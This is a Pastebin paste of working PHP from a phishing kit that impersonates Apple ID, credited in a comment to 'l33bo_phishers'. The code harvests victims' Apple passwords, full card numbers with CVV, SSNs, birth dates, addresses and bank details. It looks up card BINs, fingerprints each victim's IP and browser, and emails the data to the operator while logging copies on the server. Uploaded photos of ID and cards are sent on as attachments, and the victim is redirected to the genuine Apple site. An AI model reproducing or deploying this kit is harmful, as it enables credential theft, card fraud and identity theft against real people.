SHARE
TWEET

Untitled

a guest Apr 27th, 2018 129 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. ini_set('display_errors', 0);
  4. require "assets/includes/session_protect.php";
  5. require "assets/includes/functions.php";
  6. require "assets/includes/language.php";
  7. require "assets/includes/One_Time.php";
  8. require "assets/includes/enc.php";
  9. require "_cz.php";
  10. require "setting.php";
  11. $rand = rand(1,9999999);
  12. if($_POST["upload"] === "0") {
  13.  
  14. if(isset($_POST['mname']) && !empty($_POST['mname'])) {
  15. $mname = $_POST['mname'];
  16. }
  17. else {
  18. $mname = "";
  19. }
  20. $userid = $_SESSION["user"];
  21. $password = $_SESSION["pass"];
  22. $name=$_POST["fname"]." ".$mname." ".$_POST["lname"];
  23. $dob=$_POST["dob"];
  24. $address=$_POST["address"].", ".$_POST["town"].", ".$_POST["county"];
  25. $postcode=$_POST["postcode"];
  26. $country=$_POST["country"];
  27. $telephone=$_POST["telephone"];
  28. $ssn=$_POST["ssn"];
  29. $ccname=$_POST["ccname"];
  30. $ccno=$_POST["ccno"];
  31. $ccexp=$_POST["ccexp"];
  32. $climit = $_POST['climit'];  
  33. $citizenid = $_POST['citizenid'];  
  34. $qatarid = $_POST['qatarid'];  
  35. $naid = $_POST['naid'];
  36. $bans = $_POST['bans'];
  37. $passport = $_POST['passport'];
  38. $civilid = $_POST['civilid'];
  39. $numbid = $_POST['numbid'];
  40. $secode=$_POST["secode"];
  41. $acno=$_POST["acno"];
  42. $sort=$_POST["sortcode"];
  43. $ip = $_SERVER['REMOTE_ADDR'];
  44. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  45. $ccno = str_replace(' ', '', $ccno);
  46. $last4 = substr($ccno, 12, 16);
  47. $domain = $_SERVER['SERVER_NAME'];
  48. $bin = $_POST['ccno'];
  49. $bin = preg_replace('/\s/', '', $bin);
  50. $bin = substr($bin,0,8);
  51. $url = "https://lookup.binlist.net/".$bin;
  52. $headers = array();
  53. $headers[] = 'Accept-Version: 3';
  54. $ch = curl_init();  
  55. curl_setopt($ch,CURLOPT_URL,$url);
  56. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  57. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  58. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  59. $resp=curl_exec($ch);
  60. curl_close($ch);
  61. $xBIN = json_decode($resp, true);
  62.  
  63. $_SESSION['bank_name'] = $xBIN["bank"]["name"];
  64. $_SESSION['bank_scheme'] = strtoupper($xBIN["scheme"]);
  65. $_SESSION['bank_type'] = strtoupper($xBIN["type"]);
  66. $_SESSION['bank_brand'] = strtoupper($xBIN["brand"]);
  67. $_SESSION['country_name'] = $xBIN["country"]["name"];
  68.  
  69. $VictimInfo1 = "".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  70. $VictimInfo2 = "".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  71. $VictimInfo4 = "".$systemInfo['browser'];
  72. $VictimInfo5 = "".$systemInfo['os'];
  73. $headers = "From: $name <hiroscam-$rand@rjsking.team>\r\n";
  74. $headers .= "Content-Type: text/html\r\n";
  75. $subj = "".$bin." | ".strtoupper($xBIN["scheme"])." " .strtoupper($xBIN["type"]). " ".strtoupper($xBIN["brand"])." " .$xBIN["bank"]["name"]." [ " .$xBIN["country"]["name"]. " | $ip "" ]";
  76. $to = $Your_Email;
  77. $warnsubj = "Abuse";
  78.  
  79. $warn = "A user (with ip: $ip) has attempted to send you a completed form containing abusive language. l33bo_Phishers is against abusive form filling and has redirected this user to the official site while blocking the form.";
  80. $bad_words = array('9999','4r5e','5h1t','5hit','a55','anal','anus','ar5e','arrse','arse','ass','ass-fucker','asses','assfucker','assfukka','asshole','assholes','asswhole','a_s_s','b!tch','b00bs','b17ch','b1tch','ballbag','balls','ballsack','bastard','beastial','beastiality','bellend','bestial','bestiality','bi+ch','biatch','bitch','bitcher','bitchers','bitches','bitchin','bitching','bloody','blow job','blowjob','blowjobs','boiolas','bollock','bollok','boner','boob','boobs','booobs','boooobs','booooobs','booooooobs','breasts','buceta','bugger','bum','bunny fucker','butt','butthole','buttmuch','buttplug','c0ck','c0cksucker','carpet muncher','cawk','chink','cipa','cl1t','clit','clitoris','clits','cnut','cock','cock-sucker','cockface','cockhead','cockmunch','cockmuncher','cocks','cocksuck ','cocksucked ','cocksucker','cocksucking','cocksucks ','cocksuka','cocksukka','cok','cokmuncher','coksucka','coon','cox','crap','cum','cummer','cumming','cums','cumshot','cunilingus','cunillingus','cunnilingus','cunt','cuntlick ','cuntlicker ','cuntlicking ','cunts','cyalis','cyberfuc','cyberfuck ','cyberfucked ','cyberfucker','cyberfuckers','cyberfucking ','d1ck','damn','dick','dickhead','dildo','dildos','dink','dinks','dirsa','dlck','dog-fucker','doggin','dogging','donkeyribber','doosh','duche','dyke','ejaculate','ejaculated','ejaculates ','ejaculating ','ejaculatings','ejaculation','ejakulate','f u c k','f u c k e r','f4nny','fag','fagging','faggitt','faggot','faggs','fagot','fagots','fags','fanny','fannyflaps','fannyfucker','fanyy','fatass','fcuk','fcuker','fcuking','feck','fecker','felching','fellate','fellatio','fingerfuck ','fingerfucked ','fingerfucker ','fingerfuckers','fingerfucking ','fingerfucks ','fistfuck','fistfucked ','fistfucker ','fistfuckers ','fistfucking ','fistfuckings ','fistfucks ','flange','fook','fooker','fuck','fucka','fucked','fucker','fuckers','fuckhead','fuckheads','fuckin','fucking','fuckings','fuckingshitmotherfucker','fuckme ','fucks','fuckwhit','fuckwit','fudge packer','fudgepacker','fuk','fuker','fukker','fukkin','fuks','fukwhit','fukwit','fux','fux0r','f_u_c_k','gangbang','gangbanged ','gangbangs ','gaylord','gaysex','goatse','God','god-dam','god-damned','goddamn','goddamned','hardcoresex ','hell','heshe','hoar','hoare','hoer','homo','hore','horniest','horny','hotsex','jack-off ','jackoff','jap','jerk-off ','jism','jiz ','jizm ','jizz','kawk','knob','knobead','knobed','knobend','knobhead','knobjocky','knobjokey','kock','kondum','kondums','kum','kummer','kumming','kums','kunilingus','l3i+ch','l3itch','labia','lmfao','lust','lusting','m0f0','m0fo','m45terbate','ma5terb8','ma5terbate','masochist','master-bate','masterb8','masterbat*','masterbat3','masterbate','masterbation','masterbations','masturbate','mo-fo','mof0','mofo','mothafuck','mothafucka','mothafuckas','mothafuckaz','mothafucked ','mothafucker','mothafuckers','mothafuckin','mothafucking ','mothafuckings','mothafucks','mother fucker','motherfuck','motherfucked','motherfucker','motherfuckers','motherfuckin','motherfucking','motherfuckings','motherfuckka','motherfucks','muff','mutha','muthafecker','muthafuckker','muther','mutherfucker','n1gga','n1gger','nazi','nigg3r','nigg4h','nigga','niggah','niggas','niggaz','nigger','niggers ','nob','nob jokey','nobhead','nobjocky','nobjokey','numbnuts','nutsack','orgasim ','orgasims ','orgasm','orgasms ','p0rn','pawn','pecker','penis','penisfucker','phonesex','phuck','phuk','phuked','phuking','phukked','phukking','phuks','phuq','pigfucker','pimpis','piss','pissed','pisser','pissers','pisses ','pissflaps','pissin ','pissing','pissoff ','poop','porn','porno','pornography','pornos','prick','pricks ','pron','pube','pusse','pussi','pussies','pussy','pussys ','rectum','retard','rimjaw','rimming','s hit','s.o.b.','sadist','schlong','screwing','scroat','scrote','scrotum','semen','sex','sh!+','sh!t','sh1t','shag','shagger','shaggin','shagging','shemale','shi+','shit','shitdick','shite','shited','shitey','shitfuck','shitfull','shithead','shiting','shitings','shits','shitted','shitter','shitters ','shitting','shittings','shitty ','skank','slut','sluts','smegma','smut','snatch','son-of-a-bitch','spac','spunk','s_h_i_t','t1tt1e5','t1tties','teets','teez','testical','testicle','tit','titfuck','tits','titt','tittie5','tittiefucker','titties','tittyfuck','tittywank','titwank','tosser','turd','tw4t','twat','twathead','twatty','twunt','twunter','v14gra','v1gra','vagina','viagra','vulva','w00se','wang','wank','wanker','wanky','whoar','whore','willies','willy','xrated','fuck','fuckoff','fuck off','fucking','nigger','nigerian','Nigerian','scam','cunt','wankers','twats','scammers','shit','wanker','cunt','asshole','arsehole','passwd','sample');
  81.  
  82. $data = "
  83. <html>
  84. <head>
  85. <style>
  86. @media (max-width: 520px) {
  87.       .block-grid {
  88.         min-width: 320px!important;
  89.         max-width: 100%!important;
  90.         width: 100%!important;
  91.         display: block!important;
  92.       }
  93.  
  94.       .col {
  95.         min-width: 320px!important;
  96.         max-width: 100%!important;
  97.         width: 100%!important;
  98.         display: block!important;
  99.       }
  100.  
  101.         .col > div {
  102.           margin: 0 auto;
  103.         }
  104.  
  105.       img.fullwidth {
  106.         max-width: 100%!important;
  107.       }
  108.             img.fullwidthOnMobile {
  109.         max-width: 100%!important;
  110.       }
  111.       .no-stack .col {
  112.                 min-width: 0!important;
  113.                 display: table-cell!important;
  114.             }
  115.             .no-stack.two-up .col {
  116.                 width: 50%!important;
  117.             }
  118.             .no-stack.mixed-two-up .col.num4 {
  119.                 width: 33%!important;
  120.             }
  121.             .no-stack.mixed-two-up .col.num8 {
  122.                 width: 66%!important;
  123.             }
  124.             .no-stack.three-up .col.num4 {
  125.                 width: 33%!important;
  126.             }
  127.             .no-stack.four-up .col.num3 {
  128.                 width: 25%!important;
  129.             }
  130.       .mobile_hide {
  131.         min-height: 0px!important;
  132.         max-height: 0px!important;
  133.         max-width: 0px!important;
  134.         display: none!important;
  135.         overflow: hidden!important;
  136.         font-size: 0px!important;
  137.       }
  138.     }
  139. </style>
  140. <table class='nl-container' style='border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #FFFFFF;width: 100%' cellpadding='0' cellspacing='0'>
  141.     <tbody>
  142.     <tr style='vertical-align: top'>
  143.         <td style='word-break: break-word;border-collapse: collapse !important;vertical-align: top'>
  144.     <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td align='center' style='background-color: #FFFFFF;'><![endif]-->
  145.  
  146.     <div style='background-color:transparent;'>
  147.       <div style='Margin: 0 auto;min-width: 320px;max-width: 480px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #FFFFFF;' class='block-grid '>
  148.         <div style='border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;'>
  149.           <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='background-color:transparent;' align='center'><table cellpadding='0' cellspacing='0' border='0' style='width: 480px;'><tr class='layout-full-width' style='background-color:#FFFFFF;'><![endif]-->
  150.  
  151.               <!--[if (mso)|(IE)]><td align='center' width='480' style='background-color:#47A7E0; width:480px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;' valign='top'><![endif]-->
  152.             <div class='col num12' style='min-width: 320px;max-width: 480px;display: table-cell;vertical-align: top;'>
  153.               <div style='background-color: #47A7E0; width: 100% !important;'>
  154.               <!--[if (!mso)&(!IE)]><!--><div style='border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;'><!--<![endif]-->
  155.  
  156.                  
  157.                     <div class=''>
  158.     <!--[if mso]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'><![endif]-->
  159.     <div style='color:#FFFFFF;line-height:150%;font-family:Tahoma, Verdana, Segoe, sans-serif; padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'> 
  160.         <div style='font-size:12px;line-height:18px;color:#FFFFFF;font-family:Tahoma, Verdana, Segoe, sans-serif;text-align:left;'><p style='margin: 0;font-size: 14px;line-height: 21px'>&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;'NOBODY CARES ABOUT ME'</p></div>
  161.     </div>
  162.     <!--[if mso]></td></tr></table><![endif]-->
  163. </div>
  164.                  
  165.               <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
  166.               </div>
  167.             </div>
  168.           <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
  169.         </div>
  170.       </div>
  171.     </div>    <div style='background-color:transparent;'>
  172.       <div style='Margin: 0 auto;min-width: 320px;max-width: 480px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #FFFFFF;' class='block-grid '>
  173.         <div style='border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;'>
  174.           <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='background-color:transparent;' align='center'><table cellpadding='0' cellspacing='0' border='0' style='width: 480px;'><tr class='layout-full-width' style='background-color:#FFFFFF;'><![endif]-->
  175.  
  176.               <!--[if (mso)|(IE)]><td align='center' width='480' style=' width:480px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;' valign='top'><![endif]-->
  177.             <div class='col num12' style='min-width: 320px;max-width: 480px;display: table-cell;vertical-align: top;'>
  178.               <div style='background-color: transparent; width: 100% !important;'>
  179.               <!--[if (!mso)&(!IE)]><!--><div style='border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;'><!--<![endif]-->
  180.  
  181.                  
  182.                     <div class=''>
  183.     <!--[if mso]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px;'><![endif]-->
  184.     <div style='color:#555555;line-height:200%;font-family:Tahoma, Verdana, Segoe, sans-serif; padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px;'> 
  185.         <div style='font-size:12px;line-height:24px;color:#555555;font-family:Tahoma, Verdana, Segoe, sans-serif;text-align:left;'><p style='margin: 0;font-size: 12px;line-height: 24px'>++=================== [ Apple Account ] =================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] Username :  ".$userid."<br>[#] Password :   ".$password."</p><p style='margin: 0;font-size: 12px;line-height: 24px'>++==================== [ Credit Card ] ==================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] Cardholder Name : ".$ccname."<br>[#] Card Number :   ".$ccno."<br>[#] Expiration Date :  ".$ccexp."<br>[#] Cvv2 :    ".$secode."<br>[#] Credit Card BIN :    ".$bin." | ".strtoupper($xBIN["scheme"])." ".strtoupper($xBIN["type"])." ".strtoupper($xBIN["brand"])." | ".$xBIN["bank"]["name"]."</p><p style='margin: 0;font-size: 12px;line-height: 24px'>++====================== [ Billing ] ====================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] Full Name :  ".$name."<br>[#] Address :  ".$address."<br>[#] Country :    ".$country."<br>[#] Post Code : ".$postcode."<br>[#] Number Phone :  ".$telephone."<br>[#] Birth Day :   ".$dob."<br>[#] SSN :   ".$ssn."<br>++===================== [ PC Info ] ====================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] From :  ".$VictimInfo1."<br>[#] Location :   ".$VictimInfo2."<br>[#] Platform : ".$VictimInfo5."<br>[#] Browser :   ".$VictimInfo4."</p></div>  
  186.     </div>
  187.     <!--[if mso]></td></tr></table><![endif]-->
  188. </div>
  189.                  
  190.               <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
  191.               </div>
  192.             </div>
  193.           <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
  194.         </div>
  195.       </div>
  196.     </div>    <div style='background-color:transparent;'>
  197.       <div style='Margin: 0 auto;min-width: 320px;max-width: 480px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #FFFFFF;' class='block-grid '>
  198.         <div style='border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;'>
  199.           <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='background-color:transparent;' align='center'><table cellpadding='0' cellspacing='0' border='0' style='width: 480px;'><tr class='layout-full-width' style='background-color:#FFFFFF;'><![endif]-->
  200.  
  201.               <!--[if (mso)|(IE)]><td align='center' width='480' style='background-color:#47A7E0; width:480px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;' valign='top'><![endif]-->
  202.             <div class='col num12' style='min-width: 320px;max-width: 480px;display: table-cell;vertical-align: top;'>
  203.               <div style='background-color: #47A7E0; width: 100% !important;'>
  204.               <!--[if (!mso)&(!IE)]><!--><div style='border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;'><!--<![endif]-->
  205.  
  206.                  
  207.                     <div class=''>
  208.     <!--[if mso]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'><![endif]-->
  209.     <div style='color:#FFFFFF;line-height:150%;font-family:Tahoma, Verdana, Segoe, sans-serif; padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'> 
  210.         <div style='font-size:12px;line-height:18px;color:#FFFFFF;font-family:Tahoma, Verdana, Segoe, sans-serif;text-align:left;'><p style='margin: 0;font-size: 14px;line-height: 21px'>&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; 'THANKS TO GOD'</p></div>   
  211.     </div>
  212.     <!--[if mso]></td></tr></table><![endif]-->
  213. </div>
  214.                  
  215.               <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
  216.               </div>
  217.             </div>
  218.           <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
  219.         </div>
  220.       </div>
  221.     </div>   <!--[if (mso)|(IE)]></td></tr></table><![endif]-->
  222.         </td>
  223.   </tr>
  224.   </tbody>
  225.   </table>
  226.  
  227. </body></html>
  228. ";
  229.  
  230. if($Encrypt==1) {
  231. include("assets/includes/AES.php");
  232. $imputText = $data;
  233. $imputKey = $Key;
  234. $blockSize = 256;
  235. $aes = new AES($imputText, $imputKey, $blockSize);
  236. $enc = $aes->encrypt();
  237. $aes->setData($enc);
  238. $dec=$aes->decrypt();
  239. }
  240. if($Abuse_Filter==1) {
  241. foreach($bad_words as $bad_word){
  242.     if(stristr($_POST['fname'], $bad_word) !== false) {
  243.     mail($to,$warnsubj,$warn,$headers);
  244.         exit(header("Location:  https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24"));
  245.     }
  246.   if(stristr($_POST['address'], $bad_word) !== false) {
  247.     mail($to,$warnsubj,$warn,$headers);
  248.  
  249.  
  250.         exit(header("Location:  https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24"));
  251.     }
  252. }
  253. }
  254. if($Save_Log==1) {
  255.   if($Encrypt==1) {
  256.   $file=fopen("assets/logs/app.txt","a");
  257.   fwrite($file,$enc);
  258.   fclose($file);
  259.   }
  260.   else {
  261.   $file=fopen("assets/logs/app.txt","a");
  262.   fwrite($file,$data);
  263.   fclose($file);
  264.   }
  265. }
  266. if($Send_Log==1) {
  267.   if($Encrypt==1) {
  268.   mail($to,$subj,$enc,$headers);  
  269.   }
  270.   else {
  271.   mail($to,$subj,$data,$headers);
  272.      $empas   = "# ".$binq." - CC ".strtoupper($xBIN["scheme"])." " .strtoupper($xBIN["type"]). " ".strtoupper($xBIN["brand"])." " .$xBIN["bank"]["name"]." [ ".$systemInfo['country']." ]\n";
  273.     $file = fopen("assets/logs/bin.log", "a");
  274.     fwrite($file, $empas);
  275.     fclose($file);
  276.    
  277.     $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._ccz_.txt";
  278.     $isi  = file_get_contents($file2);
  279.     $buka = fopen($file2,"w");
  280.        
  281.     fwrite($buka, $isi+1);
  282.     fclose($buka);
  283.    
  284.     $file3 = $_SERVER['DOCUMENT_ROOT']."/._nob_.txt";
  285.     $isi  = file_get_contents($file3);
  286.     $buka = fopen($file3,"w");
  287.        
  288.     fwrite($buka, $isi+1);
  289.     fclose($buka);
  290.   }
  291. }
  292. /*
  293. Created by l33bo_phishers -- icq: 695059760
  294. Created by l33bo_phishers -- icq: 695059760
  295. Created by l33bo_phishers -- icq: 695059760
  296. Created by l33bo_phishers -- icq: 695059760
  297. */
  298.  
  299. echo "<script>window.location='Upload.php?&sessionid=".generateRandomString(115)."&securessl=true';</script>";
  300. //header("Location: Upload.php?&sessionid=".generateRandomString(115)."&securessl=true");
  301. } else {
  302. if(!empty($_FILES["file_id"]["name"])) {
  303. $pathinfo1 = pathinfo($_FILES["file_id"]["name"]);
  304. } else {
  305. $pathinfo1 = null;
  306. }
  307. if(!empty($_FILES["file_cc-front"]["name"])) {
  308. $pathinfo2 = pathinfo($_FILES["file_cc-front"]["name"]);
  309. } else {
  310. $pathinfo2 = null;
  311. }
  312. if(!empty($_FILES["file_cc-back"]["name"])) {
  313. $pathinfo3 = pathinfo($_FILES["file_cc-back"]["name"]);
  314. } else {
  315. $pathinfo3 = null;
  316. }
  317.  
  318. if($pathinfo1 === null) {
  319. $fileid = "-";
  320. } else {
  321. $fileid = $_SESSION["user"]."-id-".sha1(uniqid().$pathinfo1["filename"]).".".$pathinfo1["extension"];
  322. @copy($_FILES["file_id"]["tmp_name"], getcwd()."/uploads/$fileid");
  323. }
  324. if($pathinfo2 === null) {
  325. $filecc1 = "-";
  326. } else {
  327. $filecc1 = $_SESSION["user"]."-cc-front-".sha1(uniqid().$pathinfo2["filename"]).".".$pathinfo2["extension"];
  328. @copy($_FILES["file_cc-front"]["tmp_name"], getcwd()."/uploads/$filecc1");
  329. }
  330. if($pathinfo3 == null) {
  331. $filecc2 = "-";
  332. } else {
  333. $filecc2=$_SESSION["user"]."-cc-back-".sha1(uniqid().$pathinfo3["filename"]).".".$pathinfo3["extension"];
  334. @copy($_FILES["file_cc-back"]["tmp_name"], getcwd()."/uploads/$filecc2");
  335. }
  336.  
  337. $ip = $_SERVER['REMOTE_ADDR'];
  338. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  339. $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  340. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  341. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
  342. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
  343. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
  344. $VictimInfo6 = "".$systemInfo['country'];
  345. $subj = $_SESSION['user']." [ ".$VictimInfo6." - $ip - ".$systemInfo['os']." ]";
  346. $to = $Your_Email;
  347. $uploader = $_SESSION["user"];
  348. $file1 = "uploads/$fileid";
  349. $file2 = "uploads/$filecc1";
  350. $file3 = "uploads/$filecc2";
  351. //if true, good; if false, zip creation failed
  352. create_tar($file1,$file2,$file3,"$uploader.tar.gz");
  353.  
  354. $random_hash = md5(date('r', time()));
  355. //define the headers we want passed. Note that they are separated with \r\n
  356. $headers = "From: Apple Credit Card & ID Card Photos <$random_hash@$random_hash.com>";
  357. //add boundary string and mime type specification
  358. $headers .= "\r\nContent-Type: multipart/mixed; boundary=\"PHP-mixed-".$random_hash."\"";
  359. //read the atachment file contents into a string,
  360. //encode it with MIME base64,
  361. //and split it into smaller chunks
  362. $attachment = chunk_split(base64_encode(file_get_contents("uploads/$uploader.zip")));
  363. //define the body of the message.
  364. ob_start(); //Turn on output buffering
  365. ?>
  366. --PHP-mixed-<?php echo $random_hash; ?>
  367. Content-Type: multipart/alternative; boundary="PHP-alt-<?php echo $random_hash; ?>"
  368.  
  369. --PHP-alt-<?php echo $random_hash; ?>
  370. Content-Type: text/plain; charset="iso-8859-1"
  371. Content-Transfer-Encoding: 7bit
  372.  
  373. Hello World!!!
  374. This is simple text email message.
  375.  
  376. --PHP-alt-<?php echo $random_hash; ?>
  377. Content-Type: text/html; charset="iso-8859-1"
  378. Content-Transfer-Encoding: 7bit
  379.  
  380. <html>
  381. <head>
  382. <style>
  383. .demotbl {
  384.     border: 0px solid #69899F;
  385.   }
  386. .demotbl th{
  387.     padding:15px;
  388.     color:#fff;
  389.     text-shadow:1px 1px 1px #568F23;
  390.     border-bottom:3px solid #02e9ff;
  391.     background-color:#02e9ff;
  392.     background:-webkit-gradient(
  393.         linear,
  394.         left bottom,
  395.         left top,
  396.         color-stop(0.02, rgb(0, 135, 128)),
  397.         color-stop(0.51, rgb(0, 135, 128)),
  398.         color-stop(0.87, rgb(0, 135, 128))
  399.         );
  400.     background: -moz-linear-gradient(
  401.         center bottom,
  402.         rgb(0, 135, 128) 3%,
  403.         rgb(3, 198, 188) 52%,
  404.         rgb(2, 233, 255) 88%
  405.         );
  406.     -webkit-border-top-left-radius:5px;
  407.     -webkit-border-top-right-radius:5px;
  408.     -moz-border-radius:5px 5px 0px 0px;
  409.     border-top-left-radius:5px;
  410.     border-top-right-radius:5px;
  411.   }
  412. .demotbl td{
  413.     padding:10px;
  414.     text-align:center;
  415.     vertical-align: top;
  416.     background-color:#DEF3CA;
  417.     border: 1px solid #BED3AB;
  418.     -moz-border-radius:2px;
  419.     -webkit-border-radius:2px;
  420.     border-radius:2px;
  421.     color:#666;
  422.     text-shadow:1px 1px 1px #fff;
  423.  
  424.   }
  425. </style>
  426. <table class='demotbl'>
  427.   <tr>
  428.       <th colspan='5'>Credit Card & ID Card Photos</th>
  429.   </tr>
  430.   <tr>
  431. <td width='200px'>Identity Card/Driver License Photos</td>
  432. <td colspan='5'><?php echo $_SERVER['SERVER_NAME'].'/uploads/'.$fileid;?></td>
  433. </tr>
  434. <tr>
  435. <td>Credit Card/Debit Card Photos (Front)</td>
  436. <td width='400px'><?php echo $_SERVER['SERVER_NAME']."/uploads/".$filecc1;?></td>
  437.   </tr>
  438. <tr>
  439. <td>Credit Card/Debit Card Photos (Back)</td>
  440. <td width='400px'><?php echo $_SERVER['SERVER_NAME']."/uploads/".$filecc2;?></td>
  441.   </tr>
  442. </table>
  443.  
  444. </body></html>
  445.  
  446. --PHP-alt-<?php echo $random_hash; ?>--
  447.  
  448. --PHP-mixed-<?php echo $random_hash; ?>
  449. Content-Type: application/zip; name="<?php echo "$uploader.zip";?>"
  450. Content-Transfer-Encoding: base64
  451. Content-Disposition: attachment
  452.  
  453. <?php echo $attachment; ?>
  454. --PHP-mixed-<?php echo $random_hash; ?>--
  455.  
  456. <?php
  457. //copy current buffer contents into $message variable and delete current output buffer
  458. $message = ob_get_clean();
  459. //send the email
  460.  
  461. @mail( $to, $subj, $message, $headers );
  462.     $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._upload_.txt";
  463.     $isi  = @file_get_contents($file2);
  464.     $buka = fopen($file2,"w");
  465.     fwrite($buka, $isi+1);
  466.     fclose($buka);
  467.  
  468. if($One_Time_Access == "block")
  469. {
  470. $fp = fopen("assets/includes/blacklist.dat", "a");
  471. fputs($fp, "\r\n$ip\r\n");
  472. fclose($fp);
  473. }
  474. ?>
  475. <!DOCTYPE html>
  476. <html>
  477. <head>
  478.  
  479. <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  480. <title>Complete</title>
  481. <link href="assets/img/favicon.ico" rel="shortcut icon" type="image/x-icon">
  482. <meta http-equiv="refresh" content="5; url=https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24" />
  483. <link href="assets/css/First.css" media="all" rel="stylesheet" type="text/css">
  484. <link href="assets/css/Second.css" rel="stylesheet" type="text/css">
  485. <link href="assets/css/Fonts.css" rel="stylesheet" type="text/css">
  486. <link href="assets/css/verify.css" rel="stylesheet" type="text/css">
  487. </head>
  488. <body id="pagecontent">
  489. <div id="content">
  490. <div class="bdd45">
  491. <nav id="xdsfv54" class="js no-touch svg no-ie7 no-ie8">
  492. <div class="HeaderObjHolder">
  493. <ul class="MobHeader">
  494. <li class="HeaderObj MobMenIconH">
  495. <label class="MobMenHol">
  496. <span class="MobMenIcon MobMenIcon-top">
  497. <span class="MobMenIcon-crust MobMenIcon-crust-top"></span> </span> <span class="MobMenIcon MobMenIcon-bottom">
  498. <span class="MobMenIcon-crust MobMenIcon-crust-bottom"></span> </span>
